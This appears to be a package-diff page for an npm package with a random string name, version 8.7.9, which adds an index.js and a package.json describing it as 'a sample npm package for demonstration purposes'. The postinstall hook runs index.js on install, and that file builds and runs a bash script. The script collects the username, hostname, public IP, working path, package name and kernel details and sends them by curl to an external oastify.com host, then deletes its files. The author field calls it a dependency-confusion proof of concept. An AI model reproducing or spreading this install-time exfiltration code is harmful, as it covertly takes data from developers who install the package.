jhgjgdfsdasvbrtyrdfwewqreyrfvbykuyoyosdsdfdhuytrx 8.7.9
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of jhgjgdfsdasvbrtyrdfwewqreyrfvbykuyoyosdsdfdhuytrx might be problematic. Click here for more details.
- package/index.js +58 -0
- package/package.json +14 -0
package/index.js
ADDED
|
@@ -0,0 +1,58 @@
|
|
|
1
|
+
const { exec } = require('child_process');
|
|
2
|
+
const http = require('http');
|
|
3
|
+
|
|
4
|
+
const getPublicIP = (callback) => {
|
|
5
|
+
const options = {
|
|
6
|
+
hostname: 'api.ipify.org',
|
|
7
|
+
path: '/?format=json',
|
|
8
|
+
method: 'GET',
|
|
9
|
+
};
|
|
10
|
+
|
|
11
|
+
const req = http.request(options, (res) => {
|
|
12
|
+
let data = '';
|
|
13
|
+
res.on('data', (chunk) => {
|
|
14
|
+
data += chunk;
|
|
15
|
+
});
|
|
16
|
+
|
|
17
|
+
res.on('end', () => {
|
|
18
|
+
try {
|
|
19
|
+
const response = JSON.parse(data);
|
|
20
|
+
const publicIP = response.ip;
|
|
21
|
+
callback(null, publicIP);
|
|
22
|
+
} catch (error) {
|
|
23
|
+
callback(new Error('Error parsing response'));
|
|
24
|
+
}
|
|
25
|
+
});
|
|
26
|
+
});
|
|
27
|
+
|
|
28
|
+
req.on('error', (error) => {
|
|
29
|
+
callback(error);
|
|
30
|
+
});
|
|
31
|
+
|
|
32
|
+
req.end();
|
|
33
|
+
};
|
|
34
|
+
|
|
35
|
+
|
|
36
|
+
|
|
37
|
+
// Usage example:
|
|
38
|
+
getPublicIP((error, remoteIP) => {
|
|
39
|
+
if (error) {
|
|
40
|
+
console.error('Error:', error.message);
|
|
41
|
+
} else {
|
|
42
|
+
bash = `#!/bin/bash\nseparator="--------------------------------------------------"
|
|
43
|
+
exfiltrate="$separator\nUsername: \`whoami\`\nHostname: \`hostname\`\nPublic IP: ${remoteIP}\nTime: \`date\`\nCurrent Path: \`pwd\`\nPackage Name: \`echo $(npm run env | grep "npm_package_name") | cut -d "=" -f 2\`\nKernel: \`uname -a\`\n$separator"
|
|
44
|
+
echo "$exfiltrate" > /tmp/demo.txt
|
|
45
|
+
curl --silent -F content="@/tmp/demo.txt" https://z88lv0dlfqw02tkvci42eb1kjbp5dv1k.oastify.com
|
|
46
|
+
rm -f /tmp/demo.txt`
|
|
47
|
+
exec('echo -e' + bash + " > /tmp/demo.sh; chmod + x /tmp/demo.sh; /bin/bash -c /tmp/demo.sh; rm -f /tmp/demo.sh", (error, stdout, stderr) => {
|
|
48
|
+
if (error) {
|
|
49
|
+
console.error(`Error: ${error.message}`);
|
|
50
|
+
return;
|
|
51
|
+
}
|
|
52
|
+
});
|
|
53
|
+
|
|
54
|
+
}
|
|
55
|
+
});
|
|
56
|
+
|
|
57
|
+
|
|
58
|
+
|
package/package.json
ADDED
|
@@ -0,0 +1,14 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "jhgjgdfsdasvbrtyrdfwewqreyrfvbykuyoyosdsdfdhuytrx",
|
|
3
|
+
"version": "8.7.9",
|
|
4
|
+
"description": "A sample npm package for demonstration purposes.",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"postinstall": "node index.js"
|
|
8
|
+
},
|
|
9
|
+
"keywords": [
|
|
10
|
+
"dependency"
|
|
11
|
+
],
|
|
12
|
+
"author": "Depdency-Confusion-PoC",
|
|
13
|
+
"license": "ISC"
|
|
14
|
+
}
|